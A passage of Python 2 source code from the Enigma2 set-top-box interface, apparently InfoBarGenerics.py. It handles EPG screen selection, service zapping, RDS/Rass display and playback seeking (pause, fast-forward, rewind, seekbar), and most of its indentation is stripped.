self.openMerlinEPGCenter()
elif config.plisettings.PLIEPG_mode.value == "cooltvguide" and COOLTVGUIDE:
if self.isInfo:
self.showCoolTVGuide()
elif config.plisettings.PLIEPG_mode.value == "eventview":
self.openEventView()
else:
self.openSingleServiceEPG()
def showEventInfoWhenNotVisible(self):
if self.shown:
self.openEventView()
else:
self.toggleShow()
return 1
def zapToService(self, service, bouquet = None, preview = False, zapback = False):
if self.servicelist.startServiceRef is None:
self.servicelist.startServiceRef = self.session.nav.getCurrentlyPlayingServiceOrGroup()
self.servicelist.currentServiceRef = self.session.nav.getCurrentlyPlayingServiceOrGroup()
if service is not None:
if self.servicelist.getRoot() != bouquet: #already in correct bouquet?
self.servicelist.clearPath()
if self.servicelist.bouquet_root != bouquet:
self.servicelist.enterPath(self.servicelist.bouquet_root)
self.servicelist.enterPath(bouquet)
self.servicelist.setCurrentSelection(service) #select the service in servicelist
if not zapback or preview:
self.servicelist.zap(preview_zap = preview)
if (self.servicelist.dopipzap or zapback) and not preview:
self.servicelist.zapBack()
if not preview:
self.servicelist.startServiceRef = None
self.servicelist.startRoot = None
def getBouquetServices(self, bouquet):
services = []
servicelist = eServiceCenter.getInstance().list(bouquet)
		if servicelist is not None:
while True:
service = servicelist.getNext()
if not service.valid(): #check if end of list
break
if service.flags & (eServiceReference.isDirectory | eServiceReference.isMarker): #ignore non playable services
continue
services.append(ServiceReference(service))
return services
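	# Note: the flags test above skips directory and marker entries, so the
	# returned list only contains services that can actually be zapped to.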
def openBouquetEPG(self, bouquet = None, bouquets = None):
if bouquet:
self.StartBouquet = bouquet
self.dlg_stack.append(self.session.openWithCallback(self.closed, EPGSelection, zapFunc=self.zapToService, EPGtype=self.EPGtype, StartBouquet=self.StartBouquet, StartRef=self.StartRef, bouquets = bouquets))
def closed(self, ret=False):
if not self.dlg_stack:
return
closedScreen = self.dlg_stack.pop()
if self.bouquetSel and closedScreen == self.bouquetSel:
self.bouquetSel = None
elif self.eventView and closedScreen == self.eventView:
self.eventView = None
if ret == True or ret == 'close':
dlgs=len(self.dlg_stack)
if dlgs > 0:
self.dlg_stack[dlgs-1].close(dlgs > 1)
self.reopen(ret)
def MultiServiceEPG(self):
bouquets = self.servicelist.getBouquetList()
if bouquets is None:
cnt = 0
else:
cnt = len(bouquets)
if (self.EPGtype == "multi" and config.epgselection.multi_showbouquet.value) or (self.EPGtype == "graph" and config.epgselection.graph_showbouquet.value):
if cnt > 1: # show bouquet list
self.bouquetSel = self.session.openWithCallback(self.closed, EpgBouquetSelector, bouquets, self.openBouquetEPG, enableWrapAround=True)
self.dlg_stack.append(self.bouquetSel)
elif cnt == 1:
self.openBouquetEPG(bouquets=bouquets)
else:
self.openBouquetEPG(bouquets=bouquets)
def openMultiServiceEPG(self):
if self.servicelist is None:
return
self.EPGtype = "multi"
self.StartBouquet = self.servicelist.getRoot()
if isMoviePlayerInfoBar(self):
self.StartRef = self.lastservice
else:
self.StartRef = self.session.nav.getCurrentlyPlayingServiceOrGroup()
self.MultiServiceEPG()
def openGraphEPG(self, reopen=False):
if self.servicelist is None:
return
self.EPGtype = "graph"
if not reopen:
self.StartBouquet = self.servicelist.getRoot()
self.StartRef = self.session.nav.getCurrentlyPlayingServiceOrGroup()
self.MultiServiceEPG()
def openSingleServiceEPG(self, reopen=False):
if self.servicelist is None:
return
self.EPGtype = "enhanced"
self.SingleServiceEPG()
def openInfoBarEPG(self, reopen=False):
if self.servicelist is None:
return
if not reopen:
self.StartBouquet = self.servicelist.getRoot()
self.StartRef = self.session.nav.getCurrentlyPlayingServiceOrGroup()
if config.epgselection.infobar_type_mode.value == 'single':
self.EPGtype = "infobar"
self.SingleServiceEPG()
else:
self.EPGtype = "infobargraph"
self.MultiServiceEPG()
def showCoolTVGuide(self):
if self.servicelist is None:
return
if COOLTVGUIDE:
for plugin in plugins.getPlugins([PluginDescriptor.WHERE_EXTENSIONSMENU, PluginDescriptor.WHERE_EVENTINFO]):
if plugin.name == _("Cool TV Guide"):
self.runPlugin(plugin)
break
else:
self.session.open(MessageBox, _("The Cool TV Guide plugin is not installed!\nPlease install it."), type = MessageBox.TYPE_INFO,timeout = 10 )
def SingleServiceEPG(self):
self.StartBouquet = self.servicelist.getRoot()
self.StartRef = self.session.nav.getCurrentlyPlayingServiceOrGroup()
if isMoviePlayerInfoBar(self):
ref = self.lastservice
else:
ref = self.session.nav.getCurrentlyPlayingServiceOrGroup()
if ref:
services = self.getBouquetServices(self.StartBouquet)
self.serviceSel = SimpleServicelist(services)
if self.serviceSel.selectService(ref):
self.session.openWithCallback(self.SingleServiceEPGClosed,EPGSelection, self.servicelist, zapFunc=self.zapToService, serviceChangeCB = self.changeServiceCB, EPGtype=self.EPGtype, StartBouquet=self.StartBouquet, StartRef=self.StartRef)
else:
self.session.openWithCallback(self.SingleServiceEPGClosed, EPGSelection, ref)
def changeServiceCB(self, direction, epg):
if self.serviceSel:
if direction > 0:
self.serviceSel.nextService()
else:
self.serviceSel.prevService()
epg.setService(self.serviceSel.currentService())
def SingleServiceEPGClosed(self, ret=False):
self.serviceSel = None
self.reopen(ret)
def reopen(self, answer):
if answer == 'reopengraph':
self.openGraphEPG(True)
elif answer == 'reopeninfobargraph' or answer == 'reopeninfobar':
self.openInfoBarEPG(True)
elif answer == 'close' and isMoviePlayerInfoBar(self):
self.lastservice = self.session.nav.getCurrentlyPlayingServiceOrGroup()
self.close()
def openMerlinEPGCenter(self):
if self.servicelist is None:
return
if fileExists("/usr/lib/enigma2/python/Plugins/Extensions/MerlinEPGCenter/plugin.pyo"):
for plugin in plugins.getPlugins([PluginDescriptor.WHERE_EXTENSIONSMENU, PluginDescriptor.WHERE_EVENTINFO]):
if plugin.name == _("Merlin EPG Center"):
self.runPlugin(plugin)
break
else:
self.session.open(MessageBox, _("The Merlin EPG Center plugin is not installed!\nPlease install it."), type = MessageBox.TYPE_INFO,timeout = 10 )
def showCoolInfoGuide(self):
if self.servicelist is None:
return
if COOLTVGUIDE:
for plugin in plugins.getPlugins([PluginDescriptor.WHERE_EXTENSIONSMENU, PluginDescriptor.WHERE_EVENTINFO]):
if plugin.name == _("Cool Info Guide"):
self.runPlugin(plugin)
break
else:
self.session.open(MessageBox, _("The Cool TV Guide plugin is not installed!\nPlease install it."), type = MessageBox.TYPE_INFO,timeout = 10 )
def showCoolSingleGuide(self):
if self.servicelist is None:
return
if COOLTVGUIDE:
for plugin in plugins.getPlugins([PluginDescriptor.WHERE_EXTENSIONSMENU, PluginDescriptor.WHERE_EVENTINFO]):
if plugin.name == _("Cool Single Guide"):
self.runPlugin(plugin)
break
else:
self.session.open(MessageBox, _("The Cool TV Guide plugin is not installed!\nPlease install it."), type = MessageBox.TYPE_INFO,timeout = 10 )
def openSimilarList(self, eventid, refstr):
self.session.open(EPGSelection, refstr, eventid=eventid)
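	# getNowNext() asks the currently playing service for its event info:
	# getEvent(0) is the running ("now") event and getEvent(1) the following
	# ("next") one; events without a name are treated as absent.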
def getNowNext(self):
epglist = [ ]
service = self.session.nav.getCurrentService()
info = service and service.info()
ptr = info and info.getEvent(0)
if ptr and ptr.getEventName() != "":
epglist.append(ptr)
ptr = info and info.getEvent(1)
if ptr and ptr.getEventName() != "":
epglist.append(ptr)
self.epglist = epglist
def __evEventInfoChanged(self):
self.isInfo = True
if self.is_now_next and len(self.dlg_stack) == 1:
self.getNowNext()
if self.eventView and self.epglist:
self.eventView.setEvent(self.epglist[0])
def showDefaultEPG(self):
if self.defaultEPGType is not None:
self.defaultEPGType()
return
self.EPGPressed()
def openEventView(self, simple=False):
if self.servicelist is None:
return
ref = self.session.nav.getCurrentlyPlayingServiceOrGroup()
self.getNowNext()
epglist = self.epglist
if not epglist:
self.is_now_next = False
epg = eEPGCache.getInstance()
ptr = ref and ref.valid() and epg.lookupEventTime(ref, -1)
if ptr:
epglist.append(ptr)
ptr = epg.lookupEventTime(ref, ptr.getBeginTime(), +1)
if ptr:
epglist.append(ptr)
else:
self.is_now_next = True
if epglist:
if not simple:
self.eventView = self.session.openWithCallback(self.closed, EventViewEPGSelect, epglist[0], ServiceReference(ref), self.eventViewCallback, self.openSingleServiceEPG, self.openMultiServiceEPG, self.openSimilarList)
else:
self.eventView = self.session.openWithCallback(self.closed, EventViewSimple, epglist[0], ServiceReference(ref))
self.dlg_stack.append(self.eventView)
	def eventViewCallback(self, setEvent, setService, val): # used for now/next display
		epglist = self.epglist
		if len(epglist) > 1:
			epglist[0], epglist[1] = epglist[1], epglist[0]
		setEvent(epglist[0])
class InfoBarRdsDecoder:
"""provides RDS and Rass support/display"""
def __init__(self):
self.rds_display = self.session.instantiateDialog(RdsInfoDisplay)
self.session.instantiateSummaryDialog(self.rds_display)
self.rds_display.setAnimationMode(0)
self.rass_interactive = None
self.__event_tracker = ServiceEventTracker(screen=self, eventmap=
{
iPlayableService.evEnd: self.__serviceStopped,
iPlayableService.evUpdatedRassSlidePic: self.RassSlidePicChanged
})
self["RdsActions"] = ActionMap(["InfobarRdsActions"],
{
"startRassInteractive": self.startRassInteractive
},-1)
self["RdsActions"].setEnabled(False)
self.onLayoutFinish.append(self.rds_display.show)
self.rds_display.onRassInteractivePossibilityChanged.append(self.RassInteractivePossibilityChanged)
def RassInteractivePossibilityChanged(self, state):
self["RdsActions"].setEnabled(state)
def RassSlidePicChanged(self):
if not self.rass_interactive:
service = self.session.nav.getCurrentService()
decoder = service and service.rdsDecoder()
if decoder:
decoder.showRassSlidePicture()
def __serviceStopped(self):
if self.rass_interactive is not None:
rass_interactive = self.rass_interactive
self.rass_interactive = None
rass_interactive.close()
def startRassInteractive(self):
self.rds_display.hide()
self.rass_interactive = self.session.openWithCallback(self.RassInteractiveClosed, RassInteractive)
def RassInteractiveClosed(self, *val):
if self.rass_interactive is not None:
self.rass_interactive = None
self.RassSlidePicChanged()
self.rds_display.show()
class Seekbar(Screen):
def __init__(self, session, fwd):
Screen.__init__(self, session)
self.setTitle(_("Seek"))
self.session = session
self.fwd = fwd
self.percent = 0.0
self.length = None
service = session.nav.getCurrentService()
if service:
self.seek = service.seek()
if self.seek:
self.length = self.seek.getLength()
position = self.seek.getPlayPosition()
if self.length and position and int(self.length[1]) > 0:
if int(position[1]) > 0:
self.percent = float(position[1]) * 100.0 / float(self.length[1])
else:
self.close()
self["cursor"] = MovingPixmap()
self["time"] = Label()
self["actions"] = ActionMap(["WizardActions", "DirectionActions"], {"back": self.exit, "ok": self.keyOK, "left": self.keyLeft, "right": self.keyRight}, -1)
self.cursorTimer = eTimer()
self.cursorTimer.callback.append(self.updateCursor)
self.cursorTimer.start(200, False)
def updateCursor(self):
if self.length:
screenwidth = getDesktop(0).size().width()
if screenwidth and screenwidth == 1920:
x = 218 + int(4.05 * self.percent)
self["cursor"].moveTo(x, 23, 1)
else:
x = 145 + int(2.7 * self.percent)
self["cursor"].moveTo(x, 15, 1)
self["cursor"].startMoving()
pts = int(float(self.length[1]) / 100.0 * self.percent)
self["time"].setText("%d:%02d" % ((pts/60/90000), ((pts/90000)%60)))
def exit(self):
self.cursorTimer.stop()
self.close()
def keyOK(self):
if self.length:
self.seek.seekTo(int(float(self.length[1]) / 100.0 * self.percent))
self.exit()
def keyLeft(self):
self.percent -= float(config.seek.sensibility.value) / 10.0
if self.percent < 0.0:
self.percent = 0.0
def keyRight(self):
self.percent += float(config.seek.sensibility.value) / 10.0
if self.percent > 100.0:
self.percent = 100.0
	def keyNumberGlobal(self, number):
		# Digit keys jump straight to a position: digit N selects N*10 percent.
		self.percent = float(number) * 10.0
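# The Seekbar above maps a percentage to a PTS position: the seek target is
# length * percent / 100, while the cursor pixel offsets (218 + 4.05*percent
# on 1920-wide skins, 145 + 2.7*percent otherwise) are skin-dependent constants.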
class InfoBarSeek:
"""handles actions like seeking, pause"""
SEEK_STATE_PLAY = (0, 0, 0, ">")
SEEK_STATE_PAUSE = (1, 0, 0, "||")
SEEK_STATE_EOF = (1, 0, 0, "END")
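	# A seek state is a 4-tuple: (paused, fast-forward/rewind multiplier,
	# slow-motion divisor, on-screen label); see makeStateForward(),
	# makeStateBackward() and makeStateSlowMotion() below for how the
	# trick-play states are built from these fields.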
def __init__(self, actionmap = "InfobarSeekActions"):
self.__event_tracker = ServiceEventTracker(screen=self, eventmap=
{
iPlayableService.evSeekableStatusChanged: self.__seekableStatusChanged,
iPlayableService.evStart: self.__serviceStarted,
iPlayableService.evEOF: self.__evEOF,
iPlayableService.evSOF: self.__evSOF,
})
self.fast_winding_hint_message_showed = False
class InfoBarSeekActionMap(HelpableActionMap):
def __init__(self, screen, *args, **kwargs):
HelpableActionMap.__init__(self, screen, *args, **kwargs)
self.screen = screen
def action(self, contexts, action):
if action[:5] == "seek:":
time = int(action[5:])
self.screen.doSeekRelative(time * 90000)
return 1
elif action[:8] == "seekdef:":
key = int(action[8:])
time = (-config.seek.selfdefined_13.value, False, config.seek.selfdefined_13.value,
-config.seek.selfdefined_46.value, False, config.seek.selfdefined_46.value,
-config.seek.selfdefined_79.value, False, config.seek.selfdefined_79.value)[key-1]
self.screen.doSeekRelative(time * 90000)
return 1
else:
return HelpableActionMap.action(self, contexts, action)
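		# "seek:N" actions carry a relative seek time in seconds; it is
		# multiplied by 90000 because MPEG PTS timestamps tick at 90 kHz.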
self['SeekActions'] = InfoBarSeekActionMap(self, actionmap, {'playpauseService': (self.playpauseService, _('Pause/Continue playback')),
'pauseService': (self.pauseService, _('Pause playback')),
'pauseServiceYellow': (self.pauseServiceYellow, _('Pause playback')),
'unPauseService': (self.unPauseService, _('Continue playback')),
'okButton': (self.okButton, _('Continue playback')),
'seekFwd': (self.seekFwd, _('Seek forward')),
'seekFwdManual': (self.seekFwdManual, _('Seek forward (enter time)')),
'seekBack': (self.seekBack, _('Seek backward')),
'seekBackManual': (self.seekBackManual, _('Seek backward (enter time)')),
'SeekbarFwd': self.seekFwdSeekbar,
'SeekbarBack': self.seekBackSeekbar}, prio=-1)
self['SeekActions'].setEnabled(False)
self['SeekActionsPTS'] = InfoBarSeekActionMap(self, 'InfobarSeekActionsPTS', {'playpauseService': self.playpauseService,
'pauseService': (self.pauseService, _('Pause playback')),
'pauseServiceYellow': (self.pauseServiceYellow, _('Pause playback')),
'unPauseService': (self.unPauseService, _('Continue playback')),
'seekFwd': (self.seekFwd, _('skip forward')),
'seekFwdManual': (self.seekFwdManual, _('skip forward (enter time)')),
'seekBack': (self.seekBack, _('skip backward')),
'seekBackManual': (self.seekBackManual, _('skip backward (enter time)'))}, prio=-1)
self['SeekActionsPTS'].setEnabled(False)
self.activity = 0
self.activityTimer = eTimer()
self.activityTimer.callback.append(self.doActivityTimer)
self.seekstate = self.SEEK_STATE_PLAY
self.lastseekstate = self.SEEK_STATE_PLAY
self.seekAction = 0
self.LastseekAction = False
self.onPlayStateChanged = []
self.lockedBecauseOfSkipping = False
self.__seekableStatusChanged()
def makeStateForward(self, n):
return 0, n, 0, ">> %dx" % n
def makeStateBackward(self, n):
return 0, -n, 0, "<< %dx" % n
def makeStateSlowMotion(self, n):
return 0, 0, n, "/%d" % n
def isStateForward(self, state):
return state[1] > 1
def isStateBackward(self, state):
return state[1] < 0
def isStateSlowMotion(self, state):
return state[1] == 0 and state[2] > 1
def getHigher(self, n, lst):
for x in lst:
if x > n:
return x
return False
def getLower(self, n, lst):
lst = lst[:]
lst.reverse()
for x in lst:
if x < n:
return x
return False
def showAfterSeek(self):
if isinstance(self, InfoBarShowHide):
self.doShow()
def up(self):
pass
def down(self):
pass
def getSeek(self):
service = self.session.nav.getCurrentService()
if service is None:
return
else:
seek = service.seek()
if seek is None or not seek.isCurrentlySeekable():
return
return seek
	def isSeekable(self):
		if config.usage.enableVodMode.value:
			name = None
			url = None
			if self.session.nav.getCurrentlyPlayingServiceReference():
				url = ServiceReference(self.session.nav.getCurrentlyPlayingServiceReference()).getPath()
				name = self.session.nav.getCurrentlyPlayingServiceReference().toString().startswith('4097:')
			ext = ['.3g2', '.3gp', '.asf', '.asx', '.avi', '.flv', '.m2ts', '.mkv',
				'.mov', '.mp4', '.mpg', '.mpeg', '.rm', '.swf', '.vob', '.wmv']
			if self.getSeek() is None or (isStandardInfoBar(self) and not self.timeshiftEnabled() and name == False and str(url).endswith(tuple(ext))):
				return False
		elif self.getSeek() is None or (isStandardInfoBar(self) and not self.timeshiftEnabled()):
			return False
		return True
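	# Assumption worth noting: service references starting with "4097:" are
	# handled by the GStreamer-based player, so in VOD mode the check above
	# only disables seeking for non-GStreamer services playing container files
	# with one of the listed extensions.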
def __seekableStatusChanged(self):
global seek_withjumps_muted
if isStandardInfoBar(self) and self.timeshiftEnabled():
pass
elif not self.isSeekable():
SystemInfo["SeekStatePlay"] = False
if os.path.exists("/proc/stb/lcd/symbol_hdd"):
f = open("/proc/stb/lcd/symbol_hdd", "w")
f.write("0")
f.close()
if os.path.exists("/proc/stb/lcd/symbol_hddprogress"):
f = open("/proc/stb/lcd/symbol_hddprogress", "w")
f.write("0")
f.close()
self["SeekActions"].setEnabled(False)
self.setSeekState(self.SEEK_STATE_PLAY)
else:
self["SeekActions"].setEnabled(True)
self.activityTimer.start(int(config.seek.withjumps_repeat_ms.getValue()), False)
for c in self.onPlayStateChanged:
c(self.seekstate)
if seek_withjumps_muted and eDVBVolumecontrol.getInstance().isMuted():
print "STILL MUTED AFTER FFWD/FBACK !!!!!!!! so we unMute"
seek_withjumps_muted = False
eDVBVolumecontrol.getInstance().volumeUnMute()
def doActivityTimer(self):
if self.isSeekable():
self.activity += 16
hdd = 1
if self.activity >= 100:
self.activity = 0
if SystemInfo["FrontpanelDisplay"] and SystemInfo["Display"]:
if os.path.exists("/proc/stb/lcd/symbol_hdd"):
if config.lcd.hdd.value == "1":
file = open("/proc/stb/lcd/symbol_hdd", "w")
file.write('%d' % int(hdd))
file.close()
if os.path.exists("/proc/stb/lcd/symbol_hddprogress"):
if config.lcd.hdd.value == "1":
file = open("/proc/stb/lcd/symbol_hddprogress", "w")
file.write('%d' % int(self.activity))
file.close()
else:
self.activityTimer.stop()
self.activity = 0
hdd = 0
self.seekAction = 0
if os.path.exists("/proc/stb/lcd/symbol_hdd"):
if config.lcd.hdd.value == "1":
file = open("/proc/stb/lcd/symbol_hdd", "w")
file.write('%d' % int(hdd))
file.close()
if os.path.exists("/proc/stb/lcd/symbol_hddprogress"):
if config.lcd.hdd.value == "1":
file = open("/proc/stb/lcd/symbol_hddprogress", "w")
file.write('%d' % int(self.activity))
file.close()
if self.LastseekAction:
self.DoSeekAction()
def __serviceStarted(self):
self.fast_winding_hint_message_showed = False
self.setSeekState(self.SEEK_STATE_PLAY)
self.__seekableStatusChanged()
def setSeekState(self, state):
service = self.session.nav.getCurrentService()
if service is None:
return False
else:
if not self.isSeekable():
if state not in (self.SEEK_STATE_PLAY, self.SEEK_STATE_PAUSE):
state = self.SEEK_STATE_PLAY
pauseable = service.pause()
if pauseable is None:
state = self.SEEK_STATE_PLAY
self.seekstate = state
if pauseable is not None:
if self.seekstate[0] and self.seekstate[3] == '||':
self.activityTimer.stop()
pauseable.pause()
elif self.seekstate[0] and self.seekstate[3] == 'END':
self.activityTimer.stop()
elif self.seekstate[1]:
if not pauseable.setFastForward(self.seekstate[1]):
pass
else:
self.seekstate = self.SEEK_STATE_PLAY
elif self.seekstate[2]:
if not pauseable.setSlowMotion(self.seekstate[2]):
pass
else:
self.seekstate = self.SEEK_STATE_PAUSE
else:
self.activityTimer.start(int(config.seek.withjumps_repeat_ms.getValue()), False)
pauseable.unpause()
for c in self.onPlayStateChanged:
c(self.seekstate)
self.checkSkipShowHideLock()
if hasattr(self, 'ScreenSaverTimerStart'):
self.ScreenSaverTimerStart()
return True
def okButton(self):
if self.seekstate == self.SEEK_STATE_PLAY:
return 0
if self.seekstate == self.SEEK_STATE_PAUSE:
self.pauseService()
else:
self.unPauseService()
def playpauseService(self):
global seek_withjumps_muted
if self.seekAction != 0:
self.seekAction = 0
self.doPause(False)
seek_withjumps_muted = False
return
if self.seekstate == self.SEEK_STATE_PLAY:
self.pauseService()
elif self.seekstate == self.SEEK_STATE_PAUSE:
if config.seek.on_pause.value == 'play':
self.unPauseService()
elif config.seek.on_pause.value == 'step':
self.doSeekRelative(1)
elif config.seek.on_pause.value == 'last':
self.setSeekState(self.lastseekstate)
self.lastseekstate = self.SEEK_STATE_PLAY
else:
self.unPauseService()
def pauseService(self):
if self.seekstate != self.SEEK_STATE_EOF:
self.lastseekstate = self.seekstate
self.setSeekState(self.SEEK_STATE_PAUSE)
def pauseServiceYellow(self):
if self.seekstate != self.SEEK_STATE_EOF:
self.lastseekstate = self.seekstate
self.setSeekState(self.SEEK_STATE_PAUSE)
else:
self.playpauseService()
def unPauseService(self):
if self.seekstate == self.SEEK_STATE_PLAY:
if self.seekAction != 0:
self.playpauseService()
return
self.doPause(False)
self.setSeekState(self.SEEK_STATE_PLAY)
def doPause(self, pause):
if pause:
if not eDVBVolumecontrol.getInstance().isMuted():
eDVBVolumecontrol.getInstance().volumeMute()
elif eDVBVolumecontrol.getInstance().isMuted():
eDVBVolumecontrol.getInstance().volumeUnMute()
def doSeek(self, pts):
seekable = self.getSeek()
if seekable is None:
return
else:
seekable.seekTo(pts)
return
def doSeekRelativeAvoidStall(self, pts):
global jump_pts_adder
global jump_last_pos
global jump_last_pts
seekable = self.getSeek()
if seekable and config.seek.withjumps_avoid_zero.getValue():
position = seekable.getPlayPosition()
if jump_last_pos and jump_last_pts:
if abs(position[1] - jump_last_pos[1]) < 9000 and pts == jump_last_pts:
jump_pts_adder += pts
jump_last_pts = pts
pts += jump_pts_adder
else:
jump_pts_adder = 0
jump_last_pts = pts
else:
jump_last_pts = pts
jump_last_pos = position
self.doSeekRelative(pts)
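	# Anti-stall heuristic used above: if a jump of the same size lands within
	# 9000 PTS ticks (100 ms at 90 kHz) of the previous position, the demuxer
	# is assumed to be stuck, and jump_pts_adder grows the next jump until
	# playback actually moves again.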
def doSeekRelative(self, pts):
try:
if "<class 'Screens.InfoBar.InfoBar'>" in `self`:
if InfoBarTimeshift.timeshiftEnabled(self):
length = InfoBarTimeshift.ptsGetLength(self)
position = InfoBarTimeshift.ptsGetPosition(self)
if length is None or position is None:
return
if position + pts >= length:
InfoBarTimeshift.evEOF(self, position + pts - length)
return
if position + pts < 0:
InfoBarTimeshift.evSOF(self, position + pts)
self.showAfterSeek()
return
except:
from sys import exc_info
print "[InfoBarGenerics] error in 'def doSeekRelative'", exc_info()[:2]
seekable = self.getSeek()
if seekable is None or int(seekable.getLength()[1]) < 1:
return
else:
prevstate = self.seekstate
			setpause = getMachineBuild() in ('hd51','vs1500') and 1 # 1 enables a workaround for boxes that do not seek to a new position while paused
if self.seekstate == self.SEEK_STATE_EOF:
if prevstate == self.SEEK_STATE_PAUSE:
self.setSeekState(self.SEEK_STATE_PAUSE)
else:
self.setSeekState(self.SEEK_STATE_PLAY)
elif setpause and self.seekstate == self.SEEK_STATE_PAUSE:
print '[InfoBarGenerics] workaround jump in pause mode'
setpause = 2
self.setSeekState(self.SEEK_STATE_PLAY)
seekable.seekRelative(pts < 0 and -1 or 1, abs(pts))
if setpause == 2:
self.setSeekState(self.SEEK_STATE_PAUSE)
if abs(pts) > 100 and config.usage.show_infobar_on_skip.value:
self.showAfterSeek()
return
def DoSeekAction(self):
global seek_withjumps_muted
if self.seekAction > int(config.seek.withjumps_after_ff_speed.getValue()):
self.doSeekRelativeAvoidStall(self.seekAction * long(config.seek.withjumps_forwards_ms.getValue()) * 90)
elif self.seekAction < 0:
self.doSeekRelativeAvoidStall(self.seekAction * long(config.seek.withjumps_backwards_ms.getValue()) * 90)
for c in self.onPlayStateChanged:
if self.seekAction > int(config.seek.withjumps_after_ff_speed.getValue()): # Forward
c((0, self.seekAction, 0, ">> %dx" % self.seekAction))
elif self.seekAction < 0: # Backward
c((0, self.seekAction, 0, "<< %dx" % abs(self.seekAction)))
if self.seekAction == 0:
self.LastseekAction = False
self.doPause(False)
seek_withjumps_muted = False
self.setSeekState(self.SEEK_STATE_PLAY)
def isServiceTypeTS(self):
ref = self.session.nav.getCurrentlyPlayingServiceReference()
isTS = False
if ref is not None:
			servicetype = ServiceReference(ref).getType()
			if servicetype == 1:
isTS = True
return isTS
def seekFwd(self):
if config.seek.withjumps.value and not self.isServiceTypeTS():
self.seekFwd_new()
else:
self.seekFwd_old()
def seekBack(self):
if config.seek.withjumps.value and not self.isServiceTypeTS():
self.seekBack_new()
else:
self.seekBack_old()
def seekFwd_new(self):
global seek_withjumps_muted
self.LastseekAction = True
self.doPause(True)
seek_withjumps_muted = True
if self.seekAction >= 0:
self.seekAction = self.getHigher(abs(self.seekAction), config.seek.speeds_forward.value) or config.seek.speeds_forward.value[-1]
else:
self.seekAction = -self.getLower(abs(self.seekAction), config.seek.speeds_backward.value)
if (self.seekAction > 1) and (self.seekAction <= int(config.seek.withjumps_after_ff_speed.getValue())): # use fastforward for the configured speeds
self.setSeekState(self.makeStateForward(self.seekAction))
elif self.seekAction > int(config.seek.withjumps_after_ff_speed.getValue()): # we first need to go the play state, to stop fastforward
self.setSeekState(self.SEEK_STATE_PLAY)
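	# Jump-based winding: speeds up to config.seek.withjumps_after_ff_speed use
	# the service's native trick play (setFastForward); above that threshold the
	# code drops back to SEEK_STATE_PLAY and DoSeekAction() performs repeated
	# relative jumps on the activity timer, with audio muted via doPause(True).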
def seekBack_new(self):
global seek_withjumps_muted
self.LastseekAction = True
self.doPause(True)
seek_withjumps_muted = True
if self.seekAction <= 0:
self.seekAction = -self.getHigher(abs(self.seekAction), config.seek.speeds_backward.value) or -config.seek.speeds_backward.value[-1]
else:
self.seekAction = self.getLower(abs(self.seekAction), config.seek.speeds_forward.value)
if (self.seekAction > 1) and (self.seekAction <= int(config.seek.withjumps_after_ff_speed.getValue())): # use fastforward for the configured forwards speeds
self.setSeekState(self.makeStateForward(self.seekAction))
def seekFwd_old(self):
seek = self.getSeek()
if seek and not (seek.isCurrentlySeekable() & 2):
if not self.fast_winding_hint_message_showed and (seek.isCurrentlySeekable() & 1):
self.session.open(MessageBox, _("No fast winding possible yet.. but you can use the number buttons to skip forward/backward!"), MessageBox.TYPE_INFO, timeout=10)
self.fast_winding_hint_message_showed = True
return
return 0
if self.seekstate == self.SEEK_STATE_PLAY:
self.setSeekState(self.makeStateForward(int(config.seek.enter_forward.value)))
elif self.seekstate == self.SEEK_STATE_PAUSE:
if len(config.seek.speeds_slowmotion.value):
self.setSeekState(self.makeStateSlowMotion(config.seek.speeds_slowmotion.value[-1]))
else:
self.setSeekState(self.makeStateForward(int(config.seek.enter_forward.value)))
elif self.seekstate == self.SEEK_STATE_EOF:
pass
elif self.isStateForward(self.seekstate):
speed = self.seekstate[1]
if self.seekstate[2]:
speed /= self.seekstate[2]
speed = self.getHigher(speed, config.seek.speeds_forward.value) or config.seek.speeds_forward.value[-1]
self.setSeekState(self.makeStateForward(speed))
elif self.isStateBackward(self.seekstate):
speed = -self.seekstate[1]
if self.seekstate[2]:
speed /= self.seekstate[2]
speed = self.getLower(speed, config.seek.speeds_backward.value)
if speed:
self.setSeekState(self.makeStateBackward(speed))
else:
self.setSeekState(self.SEEK_STATE_PLAY)
elif self.isStateSlowMotion(self.seekstate):
speed = self.getLower(self.seekstate[2], config.seek.speeds_slowmotion.value) or config.seek.speeds_slowmotion.value[0]
self.setSeekState(self.makeStateSlowMotion(speed))
def seekBack_old(self):
seek = self.getSeek()
if seek and not (seek.isCurrentlySeekable() & 2):
if not self.fast_winding_hint_message_showed and (seek.isCurrentlySeekable() & 1):
self.session.open(MessageBox, _("No fast winding possible yet.. but you can use the number buttons to skip forward/backward!"), MessageBox.TYPE_INFO, timeout=10)
self.fast_winding_hint_message_showed = True
return
return 0
seekstate = self.seekstate
if seekstate == self.SEEK_STATE_PLAY:
self.setSeekState(self.makeStateBackward(int(config.seek.enter_backward.value)))
elif seekstate == self.SEEK_STATE_EOF:
self.setSeekState(self.makeStateBackward(int(config.seek.enter_backward.value)))
self.doSeekRelative(-6)
elif seekstate == self.SEEK_STATE_PAUSE:
self.doSeekRelative(-1)
elif self.isStateForward(seekstate):
speed = seekstate[1]
if seekstate[2]:
speed /= seekstate[2]
speed = self.getLower(speed, config.seek.speeds_forward.value)
if speed:
self.setSeekState(self.makeStateForward(speed))
else:
self.setSeekState(self.SEEK_STATE_PLAY)
elif self.isStateBackward(seekstate):
speed = -seekstate[1]
if seekstate[2]:
speed /= seekstate[2]
speed = self.getHigher(speed, config.seek.speeds_backward.value) or config.seek.speeds_backward.value[-1]
self.setSeekState(self.makeStateBackward(speed))
elif self.isStateSlowMotion(seekstate):
speed = self.getHigher(seekstate[2], config.seek.speeds_slowmotion.value)
if speed:
self.setSeekState(self.makeStateSlowMotion(speed))
else:
self.setSeekState(self.SEEK_STATE_PAUSE)
self.pts_lastseekspeed = self.seekstate[1]
def seekFwdManual(self, fwd=True):
if config.seek.baractivation.value == "leftright":
self.session.open(Seekbar, fwd)
else:
self.session.openWithCallback(self.fwdSeekTo, MinuteInput)
def seekBackManual(self, fwd=False):
if config.seek.baractivation.value == "leftright":
self.session.open(Seekbar, fwd)
else:
self.session.openWithCallback(self.rwdSeekTo, MinuteInput)
def seekFwdSeekbar(self, fwd=True):
if not config.seek.baractivation.value == "leftright":
self.session.open(Seekbar, fwd)
else:
self.session.openWithCallback(self.fwdSeekTo, MinuteInput)
def fwdSeekTo(self, minutes):
self.doSeekRelative(minutes * 60 * 90000)
def seekBackSeekbar(self, fwd=False):
if not config.seek.baractivation.value == "leftright":
self.session.open(Seekbar, fwd)
else:
self.session.openWithCallback(self.rwdSeekTo, MinuteInput)
def rwdSeekTo(self, minutes):
self.doSeekRelative(-minutes * 60 * 90000)
def checkSkipShowHideLock(self):
